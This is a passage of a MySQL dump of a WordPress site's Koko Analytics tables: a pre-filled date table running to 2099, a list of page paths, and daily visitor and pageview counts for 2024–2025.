('2097-07-15'),
('2097-07-16'),
('2097-07-17'),
('2097-07-18'),
('2097-07-19'),
('2097-07-20'),
('2097-07-21'),
('2097-07-22'),
('2097-07-23'),
('2097-07-24'),
('2097-07-25'),
('2097-07-26'),
('2097-07-27'),
('2097-07-28'),
('2097-07-29'),
('2097-07-30'),
('2097-07-31'),
('2097-08-01'),
('2097-08-02'),
('2097-08-03'),
('2097-08-04'),
('2097-08-05'),
('2097-08-06'),
('2097-08-07'),
('2097-08-08'),
('2097-08-09'),
('2097-08-10'),
('2097-08-11'),
('2097-08-12'),
('2097-08-13'),
('2097-08-14'),
('2097-08-15'),
('2097-08-16'),
('2097-08-17'),
('2097-08-18'),
('2097-08-19'),
('2097-08-20'),
('2097-08-21'),
('2097-08-22'),
('2097-08-23'),
('2097-08-24'),
('2097-08-25'),
('2097-08-26'),
('2097-08-27'),
('2097-08-28'),
('2097-08-29'),
('2097-08-30'),
('2097-08-31'),
('2097-09-01'),
('2097-09-02'),
('2097-09-03'),
('2097-09-04'),
('2097-09-05'),
('2097-09-06'),
('2097-09-07'),
('2097-09-08'),
('2097-09-09'),
('2097-09-10'),
('2097-09-11'),
('2097-09-12'),
('2097-09-13'),
('2097-09-14'),
('2097-09-15'),
('2097-09-16'),
('2097-09-17'),
('2097-09-18'),
('2097-09-19'),
('2097-09-20'),
('2097-09-21'),
('2097-09-22'),
('2097-09-23'),
('2097-09-24'),
('2097-09-25'),
('2097-09-26'),
('2097-09-27'),
('2097-09-28'),
('2097-09-29'),
('2097-09-30'),
('2097-10-01'),
('2097-10-02'),
('2097-10-03'),
('2097-10-04'),
('2097-10-05'),
('2097-10-06'),
('2097-10-07'),
('2097-10-08'),
('2097-10-09'),
('2097-10-10'),
('2097-10-11'),
('2097-10-12'),
('2097-10-13'),
('2097-10-14'),
('2097-10-15'),
('2097-10-16'),
('2097-10-17'),
('2097-10-18'),
('2097-10-19'),
('2097-10-20'),
('2097-10-21'),
('2097-10-22'),
('2097-10-23'),
('2097-10-24'),
('2097-10-25'),
('2097-10-26'),
('2097-10-27'),
('2097-10-28'),
('2097-10-29'),
('2097-10-30'),
('2097-10-31'),
('2097-11-01'),
('2097-11-02'),
('2097-11-03'),
('2097-11-04'),
('2097-11-05'),
('2097-11-06'),
('2097-11-07'),
('2097-11-08'),
('2097-11-09'),
('2097-11-10'),
('2097-11-11'),
('2097-11-12'),
('2097-11-13'),
('2097-11-14'),
('2097-11-15'),
('2097-11-16'),
('2097-11-17'),
('2097-11-18'),
('2097-11-19'),
('2097-11-20'),
('2097-11-21'),
('2097-11-22'),
('2097-11-23'),
('2097-11-24'),
('2097-11-25'),
('2097-11-26'),
('2097-11-27'),
('2097-11-28'),
('2097-11-29'),
('2097-11-30'),
('2097-12-01'),
('2097-12-02'),
('2097-12-03'),
('2097-12-04'),
('2097-12-05'),
('2097-12-06'),
('2097-12-07'),
('2097-12-08'),
('2097-12-09'),
('2097-12-10'),
('2097-12-11'),
('2097-12-12'),
('2097-12-13'),
('2097-12-14'),
('2097-12-15'),
('2097-12-16'),
('2097-12-17'),
('2097-12-18'),
('2097-12-19'),
('2097-12-20'),
('2097-12-21'),
('2097-12-22'),
('2097-12-23'),
('2097-12-24'),
('2097-12-25'),
('2097-12-26'),
('2097-12-27'),
('2097-12-28'),
('2097-12-29'),
('2097-12-30'),
('2097-12-31'),
('2098-01-01'),
('2098-01-02'),
('2098-01-03'),
('2098-01-04'),
('2098-01-05'),
('2098-01-06'),
('2098-01-07'),
('2098-01-08'),
('2098-01-09'),
('2098-01-10'),
('2098-01-11'),
('2098-01-12'),
('2098-01-13'),
('2098-01-14'),
('2098-01-15'),
('2098-01-16'),
('2098-01-17'),
('2098-01-18'),
('2098-01-19'),
('2098-01-20'),
('2098-01-21'),
('2098-01-22'),
('2098-01-23'),
('2098-01-24'),
('2098-01-25'),
('2098-01-26'),
('2098-01-27'),
('2098-01-28'),
('2098-01-29'),
('2098-01-30'),
('2098-01-31'),
('2098-02-01'),
('2098-02-02'),
('2098-02-03'),
('2098-02-04'),
('2098-02-05'),
('2098-02-06'),
('2098-02-07'),
('2098-02-08'),
('2098-02-09'),
('2098-02-10'),
('2098-02-11'),
('2098-02-12'),
('2098-02-13'),
('2098-02-14'),
('2098-02-15'),
('2098-02-16'),
('2098-02-17'),
('2098-02-18'),
('2098-02-19'),
('2098-02-20'),
('2098-02-21'),
('2098-02-22'),
('2098-02-23'),
('2098-02-24'),
('2098-02-25'),
('2098-02-26'),
('2098-02-27'),
('2098-02-28'),
('2098-03-01'),
('2098-03-02'),
('2098-03-03'),
('2098-03-04'),
('2098-03-05'),
('2098-03-06'),
('2098-03-07'),
('2098-03-08'),
('2098-03-09'),
('2098-03-10'),
('2098-03-11'),
('2098-03-12'),
('2098-03-13'),
('2098-03-14'),
('2098-03-15'),
('2098-03-16'),
('2098-03-17'),
('2098-03-18'),
('2098-03-19'),
('2098-03-20'),
('2098-03-21'),
('2098-03-22'),
('2098-03-23'),
('2098-03-24'),
('2098-03-25'),
('2098-03-26'),
('2098-03-27'),
('2098-03-28'),
('2098-03-29'),
('2098-03-30'),
('2098-03-31'),
('2098-04-01'),
('2098-04-02'),
('2098-04-03'),
('2098-04-04'),
('2098-04-05'),
('2098-04-06'),
('2098-04-07'),
('2098-04-08'),
('2098-04-09'),
('2098-04-10'),
('2098-04-11'),
('2098-04-12'),
('2098-04-13'),
('2098-04-14'),
('2098-04-15'),
('2098-04-16'),
('2098-04-17'),
('2098-04-18'),
('2098-04-19'),
('2098-04-20'),
('2098-04-21'),
('2098-04-22'),
('2098-04-23'),
('2098-04-24'),
('2098-04-25'),
('2098-04-26'),
('2098-04-27'),
('2098-04-28'),
('2098-04-29'),
('2098-04-30'),
('2098-05-01'),
('2098-05-02'),
('2098-05-03'),
('2098-05-04'),
('2098-05-05'),
('2098-05-06'),
('2098-05-07'),
('2098-05-08'),
('2098-05-09'),
('2098-05-10'),
('2098-05-11'),
('2098-05-12'),
('2098-05-13'),
('2098-05-14'),
('2098-05-15'),
('2098-05-16'),
('2098-05-17'),
('2098-05-18'),
('2098-05-19'),
('2098-05-20'),
('2098-05-21'),
('2098-05-22'),
('2098-05-23'),
('2098-05-24'),
('2098-05-25'),
('2098-05-26'),
('2098-05-27'),
('2098-05-28'),
('2098-05-29'),
('2098-05-30'),
('2098-05-31'),
('2098-06-01'),
('2098-06-02'),
('2098-06-03'),
('2098-06-04'),
('2098-06-05'),
('2098-06-06'),
('2098-06-07'),
('2098-06-08'),
('2098-06-09'),
('2098-06-10'),
('2098-06-11'),
('2098-06-12'),
('2098-06-13'),
('2098-06-14'),
('2098-06-15'),
('2098-06-16'),
('2098-06-17'),
('2098-06-18'),
('2098-06-19'),
('2098-06-20'),
('2098-06-21'),
('2098-06-22'),
('2098-06-23'),
('2098-06-24'),
('2098-06-25'),
('2098-06-26'),
('2098-06-27'),
('2098-06-28'),
('2098-06-29'),
('2098-06-30'),
('2098-07-01'),
('2098-07-02'),
('2098-07-03'),
('2098-07-04'),
('2098-07-05'),
('2098-07-06'),
('2098-07-07'),
('2098-07-08'),
('2098-07-09'),
('2098-07-10'),
('2098-07-11'),
('2098-07-12'),
('2098-07-13'),
('2098-07-14'),
('2098-07-15'),
('2098-07-16'),
('2098-07-17'),
('2098-07-18'),
('2098-07-19'),
('2098-07-20'),
('2098-07-21'),
('2098-07-22'),
('2098-07-23'),
('2098-07-24'),
('2098-07-25'),
('2098-07-26'),
('2098-07-27'),
('2098-07-28'),
('2098-07-29'),
('2098-07-30'),
('2098-07-31'),
('2098-08-01'),
('2098-08-02'),
('2098-08-03'),
('2098-08-04'),
('2098-08-05'),
('2098-08-06'),
('2098-08-07'),
('2098-08-08'),
('2098-08-09'),
('2098-08-10'),
('2098-08-11'),
('2098-08-12'),
('2098-08-13'),
('2098-08-14'),
('2098-08-15'),
('2098-08-16'),
('2098-08-17'),
('2098-08-18'),
('2098-08-19'),
('2098-08-20'),
('2098-08-21'),
('2098-08-22'),
('2098-08-23'),
('2098-08-24'),
('2098-08-25'),
('2098-08-26'),
('2098-08-27'),
('2098-08-28'),
('2098-08-29'),
('2098-08-30'),
('2098-08-31'),
('2098-09-01'),
('2098-09-02'),
('2098-09-03'),
('2098-09-04'),
('2098-09-05'),
('2098-09-06'),
('2098-09-07'),
('2098-09-08'),
('2098-09-09'),
('2098-09-10'),
('2098-09-11'),
('2098-09-12'),
('2098-09-13'),
('2098-09-14'),
('2098-09-15'),
('2098-09-16'),
('2098-09-17'),
('2098-09-18'),
('2098-09-19'),
('2098-09-20'),
('2098-09-21'),
('2098-09-22'),
('2098-09-23'),
('2098-09-24'),
('2098-09-25'),
('2098-09-26'),
('2098-09-27'),
('2098-09-28'),
('2098-09-29'),
('2098-09-30'),
('2098-10-01'),
('2098-10-02'),
('2098-10-03'),
('2098-10-04'),
('2098-10-05'),
('2098-10-06'),
('2098-10-07'),
('2098-10-08'),
('2098-10-09'),
('2098-10-10'),
('2098-10-11'),
('2098-10-12'),
('2098-10-13'),
('2098-10-14'),
('2098-10-15'),
('2098-10-16'),
('2098-10-17'),
('2098-10-18'),
('2098-10-19'),
('2098-10-20'),
('2098-10-21'),
('2098-10-22'),
('2098-10-23'),
('2098-10-24'),
('2098-10-25'),
('2098-10-26'),
('2098-10-27'),
('2098-10-28'),
('2098-10-29'),
('2098-10-30'),
('2098-10-31'),
('2098-11-01'),
('2098-11-02'),
('2098-11-03'),
('2098-11-04'),
('2098-11-05'),
('2098-11-06'),
('2098-11-07'),
('2098-11-08'),
('2098-11-09'),
('2098-11-10'),
('2098-11-11'),
('2098-11-12'),
('2098-11-13'),
('2098-11-14'),
('2098-11-15'),
('2098-11-16'),
('2098-11-17'),
('2098-11-18'),
('2098-11-19'),
('2098-11-20'),
('2098-11-21'),
('2098-11-22'),
('2098-11-23'),
('2098-11-24'),
('2098-11-25'),
('2098-11-26'),
('2098-11-27'),
('2098-11-28'),
('2098-11-29'),
('2098-11-30'),
('2098-12-01'),
('2098-12-02'),
('2098-12-03'),
('2098-12-04'),
('2098-12-05'),
('2098-12-06'),
('2098-12-07'),
('2098-12-08'),
('2098-12-09'),
('2098-12-10'),
('2098-12-11'),
('2098-12-12'),
('2098-12-13'),
('2098-12-14'),
('2098-12-15'),
('2098-12-16'),
('2098-12-17'),
('2098-12-18'),
('2098-12-19'),
('2098-12-20'),
('2098-12-21'),
('2098-12-22'),
('2098-12-23'),
('2098-12-24'),
('2098-12-25'),
('2098-12-26'),
('2098-12-27'),
('2098-12-28'),
('2098-12-29'),
('2098-12-30'),
('2098-12-31'),
('2099-01-01'),
('2099-01-02'),
('2099-01-03'),
('2099-01-04'),
('2099-01-05'),
('2099-01-06'),
('2099-01-07'),
('2099-01-08'),
('2099-01-09'),
('2099-01-10'),
('2099-01-11'),
('2099-01-12'),
('2099-01-13'),
('2099-01-14'),
('2099-01-15'),
('2099-01-16'),
('2099-01-17'),
('2099-01-18'),
('2099-01-19'),
('2099-01-20'),
('2099-01-21'),
('2099-01-22'),
('2099-01-23'),
('2099-01-24'),
('2099-01-25'),
('2099-01-26'),
('2099-01-27'),
('2099-01-28'),
('2099-01-29'),
('2099-01-30'),
('2099-01-31'),
('2099-02-01'),
('2099-02-02'),
('2099-02-03'),
('2099-02-04'),
('2099-02-05'),
('2099-02-06'),
('2099-02-07'),
('2099-02-08'),
('2099-02-09'),
('2099-02-10'),
('2099-02-11'),
('2099-02-12'),
('2099-02-13'),
('2099-02-14'),
('2099-02-15'),
('2099-02-16'),
('2099-02-17'),
('2099-02-18'),
('2099-02-19'),
('2099-02-20'),
('2099-02-21'),
('2099-02-22'),
('2099-02-23'),
('2099-02-24'),
('2099-02-25'),
('2099-02-26'),
('2099-02-27'),
('2099-02-28'),
('2099-03-01'),
('2099-03-02'),
('2099-03-03'),
('2099-03-04'),
('2099-03-05'),
('2099-03-06'),
('2099-03-07'),
('2099-03-08'),
('2099-03-09'),
('2099-03-10'),
('2099-03-11'),
('2099-03-12'),
('2099-03-13'),
('2099-03-14'),
('2099-03-15'),
('2099-03-16'),
('2099-03-17'),
('2099-03-18'),
('2099-03-19'),
('2099-03-20'),
('2099-03-21'),
('2099-03-22'),
('2099-03-23'),
('2099-03-24'),
('2099-03-25'),
('2099-03-26'),
('2099-03-27'),
('2099-03-28'),
('2099-03-29'),
('2099-03-30'),
('2099-03-31'),
('2099-04-01'),
('2099-04-02'),
('2099-04-03'),
('2099-04-04'),
('2099-04-05'),
('2099-04-06'),
('2099-04-07'),
('2099-04-08'),
('2099-04-09'),
('2099-04-10'),
('2099-04-11'),
('2099-04-12'),
('2099-04-13'),
('2099-04-14'),
('2099-04-15'),
('2099-04-16'),
('2099-04-17'),
('2099-04-18'),
('2099-04-19'),
('2099-04-20'),
('2099-04-21'),
('2099-04-22'),
('2099-04-23'),
('2099-04-24'),
('2099-04-25'),
('2099-04-26'),
('2099-04-27'),
('2099-04-28'),
('2099-04-29'),
('2099-04-30'),
('2099-05-01'),
('2099-05-02'),
('2099-05-03'),
('2099-05-04'),
('2099-05-05'),
('2099-05-06'),
('2099-05-07'),
('2099-05-08'),
('2099-05-09'),
('2099-05-10'),
('2099-05-11'),
('2099-05-12'),
('2099-05-13'),
('2099-05-14'),
('2099-05-15'),
('2099-05-16'),
('2099-05-17'),
('2099-05-18'),
('2099-05-19'),
('2099-05-20'),
('2099-05-21'),
('2099-05-22'),
('2099-05-23'),
('2099-05-24'),
('2099-05-25'),
('2099-05-26'),
('2099-05-27'),
('2099-05-28'),
('2099-05-29'),
('2099-05-30'),
('2099-05-31'),
('2099-06-01'),
('2099-06-02'),
('2099-06-03'),
('2099-06-04'),
('2099-06-05'),
('2099-06-06'),
('2099-06-07'),
('2099-06-08'),
('2099-06-09'),
('2099-06-10'),
('2099-06-11'),
('2099-06-12'),
('2099-06-13'),
('2099-06-14'),
('2099-06-15'),
('2099-06-16'),
('2099-06-17'),
('2099-06-18'),
('2099-06-19'),
('2099-06-20'),
('2099-06-21'),
('2099-06-22'),
('2099-06-23'),
('2099-06-24'),
('2099-06-25'),
('2099-06-26'),
('2099-06-27'),
('2099-06-28'),
('2099-06-29'),
('2099-06-30'),
('2099-07-01'),
('2099-07-02'),
('2099-07-03'),
('2099-07-04'),
('2099-07-05'),
('2099-07-06'),
('2099-07-07'),
('2099-07-08'),
('2099-07-09'),
('2099-07-10'),
('2099-07-11'),
('2099-07-12'),
('2099-07-13'),
('2099-07-14'),
('2099-07-15'),
('2099-07-16'),
('2099-07-17'),
('2099-07-18'),
('2099-07-19'),
('2099-07-20'),
('2099-07-21'),
('2099-07-22'),
('2099-07-23'),
('2099-07-24'),
('2099-07-25'),
('2099-07-26'),
('2099-07-27'),
('2099-07-28'),
('2099-07-29'),
('2099-07-30'),
('2099-07-31'),
('2099-08-01'),
('2099-08-02'),
('2099-08-03'),
('2099-08-04'),
('2099-08-05'),
('2099-08-06'),
('2099-08-07'),
('2099-08-08'),
('2099-08-09'),
('2099-08-10'),
('2099-08-11'),
('2099-08-12'),
('2099-08-13'),
('2099-08-14'),
('2099-08-15'),
('2099-08-16'),
('2099-08-17'),
('2099-08-18'),
('2099-08-19'),
('2099-08-20'),
('2099-08-21'),
('2099-08-22'),
('2099-08-23'),
('2099-08-24'),
('2099-08-25'),
('2099-08-26'),
('2099-08-27'),
('2099-08-28'),
('2099-08-29'),
('2099-08-30'),
('2099-08-31'),
('2099-09-01'),
('2099-09-02'),
('2099-09-03'),
('2099-09-04'),
('2099-09-05'),
('2099-09-06'),
('2099-09-07'),
('2099-09-08'),
('2099-09-09'),
('2099-09-10'),
('2099-09-11'),
('2099-09-12'),
('2099-09-13'),
('2099-09-14'),
('2099-09-15'),
('2099-09-16'),
('2099-09-17'),
('2099-09-18'),
('2099-09-19'),
('2099-09-20'),
('2099-09-21'),
('2099-09-22'),
('2099-09-23'),
('2099-09-24'),
('2099-09-25'),
('2099-09-26'),
('2099-09-27'),
('2099-09-28'),
('2099-09-29'),
('2099-09-30'),
('2099-10-01'),
('2099-10-02'),
('2099-10-03'),
('2099-10-04'),
('2099-10-05'),
('2099-10-06'),
('2099-10-07'),
('2099-10-08'),
('2099-10-09'),
('2099-10-10'),
('2099-10-11'),
('2099-10-12'),
('2099-10-13'),
('2099-10-14'),
('2099-10-15'),
('2099-10-16'),
('2099-10-17'),
('2099-10-18'),
('2099-10-19'),
('2099-10-20'),
('2099-10-21'),
('2099-10-22'),
('2099-10-23'),
('2099-10-24'),
('2099-10-25'),
('2099-10-26'),
('2099-10-27'),
('2099-10-28'),
('2099-10-29'),
('2099-10-30'),
('2099-10-31'),
('2099-11-01'),
('2099-11-02'),
('2099-11-03'),
('2099-11-04'),
('2099-11-05'),
('2099-11-06'),
('2099-11-07'),
('2099-11-08'),
('2099-11-09'),
('2099-11-10'),
('2099-11-11'),
('2099-11-12'),
('2099-11-13'),
('2099-11-14'),
('2099-11-15'),
('2099-11-16'),
('2099-11-17'),
('2099-11-18'),
('2099-11-19'),
('2099-11-20'),
('2099-11-21'),
('2099-11-22'),
('2099-11-23'),
('2099-11-24'),
('2099-11-25'),
('2099-11-26'),
('2099-11-27'),
('2099-11-28'),
('2099-11-29'),
('2099-11-30'),
('2099-12-01'),
('2099-12-02'),
('2099-12-03'),
('2099-12-04'),
('2099-12-05'),
('2099-12-06'),
('2099-12-07'),
('2099-12-08'),
('2099-12-09'),
('2099-12-10'),
('2099-12-11'),
('2099-12-12'),
('2099-12-13'),
('2099-12-14'),
('2099-12-15'),
('2099-12-16'),
('2099-12-17'),
('2099-12-18'),
('2099-12-19'),
('2099-12-20'),
('2099-12-21'),
('2099-12-22'),
('2099-12-23'),
('2099-12-24'),
('2099-12-25'),
('2099-12-26'),
('2099-12-27'),
('2099-12-28'),
('2099-12-29'),
('2099-12-30'),
('2099-12-31');
/*!40000 ALTER TABLE `wp_koko_analytics_dates` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_koko_analytics_paths`
--

DROP TABLE IF EXISTS `wp_koko_analytics_paths`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_koko_analytics_paths` (
  `id` mediumint(8) unsigned NOT NULL AUTO_INCREMENT,
  `path` varchar(2000) NOT NULL,
  PRIMARY KEY (`id`),
  KEY `path` (`path`(191))
) ENGINE=InnoDB AUTO_INCREMENT=35 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_koko_analytics_paths`
--

LOCK TABLES `wp_koko_analytics_paths` WRITE;
/*!40000 ALTER TABLE `wp_koko_analytics_paths` DISABLE KEYS */;
INSERT INTO `wp_koko_analytics_paths` VALUES
(1,'/'),
(2,'/?p=104'),
(3,'/?p=123'),
(4,'/?p=140'),
(5,'/?p=147'),
(6,'/?p=136'),
(7,'/?p=127'),
(8,'/?p=107'),
(9,'/?p=158'),
(10,'/?p=119'),
(11,'/?p=112'),
(12,'/?p=177'),
(13,'/?p=189'),
(14,'/?p=306'),
(15,'/?p=327'),
(16,'/?p=116'),
(17,'/?p=349'),
(18,'/?p=367'),
(19,'/?p=441'),
(20,'/?p=444'),
(21,'/?p=449'),
(22,'/?p=96'),
(23,'/?p=457'),
(24,'/?p=463'),
(25,'/?p=100'),
(26,'/?p=358'),
(27,'/?p=388'),
(28,'/?p=453'),
(29,'/?p=660'),
(30,'/?p=649'),
(31,'/?p=541'),
(32,'/?p=592'),
(33,'/?p=552'),
(34,'/?cat=1');
/*!40000 ALTER TABLE `wp_koko_analytics_paths` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_koko_analytics_post_stats`
--

DROP TABLE IF EXISTS `wp_koko_analytics_post_stats`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_koko_analytics_post_stats` (
  `date` date NOT NULL,
  `path_id` int(10) unsigned NOT NULL,
  `post_id` int(10) unsigned NOT NULL DEFAULT 0,
  `visitors` int(10) unsigned NOT NULL DEFAULT 0,
  `pageviews` int(10) unsigned NOT NULL DEFAULT 0,
  PRIMARY KEY (`date`,`path_id`)
) ENGINE=InnoDB DEFAULT CHARSET=ascii COLLATE=ascii_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_koko_analytics_post_stats`
--

LOCK TABLES `wp_koko_analytics_post_stats` WRITE;
/*!40000 ALTER TABLE `wp_koko_analytics_post_stats` DISABLE KEYS */;
INSERT INTO `wp_koko_analytics_post_stats` VALUES
('2024-07-29',1,19,2,4),
('2024-07-30',1,19,6,10),
('2024-07-30',2,104,1,1),
('2024-07-30',3,123,1,1),
('2024-07-30',4,140,1,1),
('2024-07-30',5,147,1,1),
('2024-07-31',1,19,4,5),
('2024-08-01',1,19,8,10),
('2024-08-01',3,123,1,1),
('2024-08-02',1,19,6,9),
('2024-08-03',1,19,5,17),
('2024-08-03',4,140,2,2),
('2024-08-03',5,147,1,1),
('2024-08-03',6,136,1,1),
('2024-08-04',1,19,3,3),
('2024-08-04',3,123,1,1),
('2024-08-05',1,19,4,8),
('2024-08-05',2,104,1,1),
('2024-08-05',4,140,1,1),
('2024-08-05',6,136,1,1),
('2024-08-05',7,127,1,1),
('2024-08-06',1,19,22,63),
('2024-08-06',2,104,1,1),
('2024-08-06',3,123,3,4),
('2024-08-06',6,136,1,1),
('2024-08-06',8,107,1,1),
('2024-08-06',9,158,2,7),
('2024-08-07',1,19,7,14),
('2024-08-07',3,123,1,1),
('2024-08-07',10,119,1,1),
('2024-08-09',1,19,4,7),
('2024-08-09',2,104,1,1),
('2024-08-10',1,19,1,1),
('2024-08-11',1,19,8,9),
('2024-08-12',1,19,4,7),
('2024-08-13',1,19,4,6),
('2024-08-14',1,19,9,14),
('2024-08-14',3,123,1,1),
('2024-08-14',9,158,1,2),
('2024-08-14',11,112,1,1),
('2024-08-15',1,19,7,32),
('2024-08-15',3,123,1,1),
('2024-08-15',9,158,1,1),
('2024-08-15',12,177,2,5),
('2024-08-15',13,189,1,3),
('2024-08-16',1,19,5,13),
('2024-08-16',12,177,1,1),
('2024-08-17',1,19,1,1),
('2024-08-19',1,19,3,3),
('2024-08-20',1,19,4,8),
('2024-08-21',1,19,0,1),
('2024-08-21',13,189,1,2),
('2024-08-22',1,19,2,3),
('2024-08-22',12,177,1,1),
('2024-08-23',1,19,3,28),
('2024-08-24',1,19,2,2),
('2024-08-25',1,19,4,7),
('2024-08-26',1,19,6,29),
('2024-08-26',2,104,1,1),
('2024-08-26',12,177,1,1),
('2024-08-26',13,189,1,1),
('2024-08-27',1,19,16,67),
('2024-08-27',2,104,1,1),
('2024-08-27',9,158,1,1),
('2024-08-27',13,189,1,4),
('2024-08-28',1,19,21,156),
('2024-08-29',1,19,24,120),
('2024-08-29',4,140,1,1),
('2024-08-30',1,19,12,110),
('2024-08-30',3,123,1,1),
('2024-08-30',5,147,1,1),
('2024-08-30',9,158,1,1),
('2024-08-30',13,189,2,6),
('2024-08-30',14,306,3,10),
('2024-08-30',15,327,1,2),
('2024-08-31',1,19,5,5),
('2024-09-01',1,19,3,5),
('2024-09-01',7,127,1,1),
('2024-09-02',1,19,6,9),
('2024-09-02',6,136,1,1),
('2024-09-02',16,116,1,1),
('2024-09-03',1,19,11,34),
('2024-09-03',13,189,1,3),
('2024-09-03',17,349,3,4),
('2024-09-04',1,19,6,11),
('2024-09-05',1,19,7,10),
('2024-09-06',1,19,8,13),
('2024-09-06',4,140,1,1),
('2024-09-06',13,189,1,2),
('2024-09-07',1,19,3,3),
('2024-09-08',1,19,1,1),
('2024-09-09',1,19,9,15),
('2024-09-10',1,19,4,4),
('2024-09-11',1,19,6,8),
('2024-09-12',1,19,6,31),
('2024-09-12',18,367,1,1),
('2024-09-14',1,19,2,3),
('2024-09-15',1,19,2,2),
('2024-09-16',1,19,3,7),
('2024-09-17',1,19,4,6),
('2024-09-17',12,177,1,1),
('2024-09-18',1,19,3,3),
('2024-09-18',4,140,1,1),
('2024-09-19',1,19,6,8),
('2024-09-19',4,140,2,2),
('2024-09-20',1,19,4,4),
('2024-09-20',4,140,1,1),
('2024-09-20',12,177,1,1),
('2024-09-20',13,189,1,1),
('2024-09-20',17,349,1,1),
('2024-09-20',18,367,1,1),
('2024-09-23',1,19,4,6),
('2024-09-24',1,19,8,70),
('2024-09-24',18,367,1,1),
('2024-09-25',1,19,10,31),
('2024-09-25',19,441,1,2),
('2024-09-25',20,444,2,2),
('2024-09-25',21,449,2,2),
('2024-09-26',1,19,8,12),
('2024-09-27',1,19,3,4),
('2024-09-28',1,19,3,4),
('2024-09-29',1,19,1,2),
('2024-09-30',1,19,5,8),
('2024-10-01',1,19,1,11),
('2024-10-01',16,116,1,1),
('2024-10-02',1,19,4,6),
('2024-10-04',1,19,2,2),
('2024-10-05',1,19,2,2),
('2024-10-10',1,19,1,1),
('2025-01-14',1,19,10,21),
('2025-01-14',18,367,1,1),
('2025-01-15',1,19,3,5),
('2025-01-16',1,19,4,4),
('2025-01-17',1,19,3,7),
('2025-01-17',16,116,1,1),
('2025-01-18',1,19,3,3),
('2025-01-19',1,19,2,3),
('2025-01-20',1,19,15,19),
('2025-01-21',1,19,11,27),
('2025-01-22',1,19,9,10),
('2025-01-23',1,19,8,22),
('2025-01-24',1,19,6,7),
('2025-01-25',1,19,6,11),
('2025-01-25',4,140,1,1),
('2025-01-26',1,19,7,12),
('2025-01-27',1,19,9,13),
('2025-01-27',16,116,1,1),
('2025-01-28',1,19,2,2),
('2025-01-28',18,367,1,1),
('2025-01-29',1,19,14,25),
('2025-01-29',18,367,1,1),
('2025-01-30',1,19,5,6),
('2025-01-31',1,19,5,8),
('2025-02-01',1,19,3,4),
('2025-02-02',1,19,4,5),
('2025-02-03',1,19,5,5),
('2025-02-04',1,19,4,4),
('2025-02-04',16,116,2,2),
('2025-02-04',18,367,1,1),
('2025-02-05',1,19,7,17),
('2025-02-06',1,19,5,8),
('2025-02-06',16,116,1,1),
('2025-02-07',1,19,4,10),
('2025-02-07',19,441,1,1),
('2025-02-08',1,19,5,7),
('2025-02-09',1,19,3,4),
('2025-02-09',19,441,1,1),
('2025-02-10',1,19,6,8),
('2025-02-10',18,367,1,1),
('2025-02-11',1,19,4,10),
('2025-02-12',1,19,2,2),
('2025-02-13',1,19,5,5),
('2025-02-14',1,19,8,10),
('2025-02-15',1,19,5,6),
('2025-02-16',1,19,2,4),
('2025-02-16',4,140,1,1),
('2025-02-17',1,19,8,9),
('2025-02-17',16,116,1,1),
('2025-02-18',1,19,4,7),
('2025-02-19',1,19,7,11),
('2025-02-19',9,158,1,2),
('2025-02-20',1,19,8,10),
('2025-02-21',1,19,5,6),
('2025-02-21',16,116,1,1),
('2025-02-22',1,19,9,19),
('2025-02-23',1,19,9,19),
('2025-02-23',16,116,1,1),
('2025-02-23',18,367,1,2),
('2025-02-24',1,19,5,8),
('2025-02-24',4,140,1,1),
('2025-02-25',1,19,5,10),
('2025-02-25',22,96,1,1),
('2025-02-27',1,19,3,3),
('2025-02-28',1,19,1,1),
('2025-03-01',1,19,6,6),
('2025-03-02',1,19,5,11),
('2025-03-03',1,19,5,5),
('2025-03-04',1,19,4,5),
('2025-03-05',1,19,4,5),
('2025-03-06',1,19,8,11),
('2025-03-07',1,19,4,4),
('2025-03-08',1,19,4,4),
('2025-03-09',16,116,1,1),
('2025-03-10',1,19,5,9),
('2025-03-11',1,19,10,13),
('2025-03-11',4,140,2,3),
('2025-03-12',1,19,3,7),
('2025-03-13',1,19,7,7),
('2025-03-14',1,19,5,5),
('2025-03-15',1,19,7,7),
('2025-03-16',1,19,2,2),
('2025-03-17',1,19,8,14),
('2025-03-18',1,19,4,10),
('2025-03-19',1,19,8,14),
('2025-03-19',8,107,1,1),
('2025-03-20',1,19,12,16),
('2025-03-20',18,367,1,1),
('2025-03-20',23,457,1,1),
('2025-03-20',24,463,1,1),
('2025-03-21',1,19,9,10),
('2025-03-22',1,19,3,5),
('2025-03-23',1,19,4,14),
('2025-03-23',4,140,1,1),
('2025-03-23',18,367,1,1),
('2025-03-23',19,441,1,1),
('2025-03-23',24,463,2,2),
('2025-03-24',1,19,4,7),
('2025-03-24',4,140,1,1),
('2025-03-25',1,19,10,11),
('2025-03-26',1,19,11,20),
('2025-03-27',1,19,8,15),
('2025-03-27',19,441,2,2),
('2025-03-28',1,19,4,9),
('2025-03-28',19,441,2,2),
('2025-03-29',1,19,6,13),
('2025-03-29',7,127,1,1),
('2025-03-29',10,119,1,1),
('2025-03-29',13,189,1,2),
('2025-03-29',14,306,1,1),
('2025-03-29',16,116,1,1),
('2025-03-29',20,444,1,1),
('2025-03-29',21,449,1,1),
('2025-03-29',23,457,1,1),
('2025-03-29',24,463,1,2),
('2025-03-29',25,100,1,2),
('2025-03-29',26,358,1,1),
('2025-03-29',27,388,1,1),
('2025-03-29',28,453,1,3),
('2025-03-30',1,19,8,8),
('2025-03-30',23,457,1,1),
('2025-03-31',1,19,35,53),
('2025-03-31',18,367,2,2),
('2025-03-31',19,441,2,2),
('2025-03-31',23,457,1,1),
('2025-04-01',1,19,7,10),
('2025-04-02',1,19,4,7),
('2025-04-03',1,19,4,7),
('2025-04-03',5,147,1,1),
('2025-04-04',1,19,4,7),
('2025-04-04',18,367,1,1),
('2025-04-05',1,19,4,4),
('2025-04-05',5,147,1,1),
('2025-04-05',19,441,1,2),
('2025-04-05',21,449,1,1),
('2025-04-06',1,19,3,5),
('2025-04-07',1,19,16,20),
('2025-04-08',1,19,3,6),
('2025-04-08',18,367,1,1),
('2025-04-08',19,441,1,1),
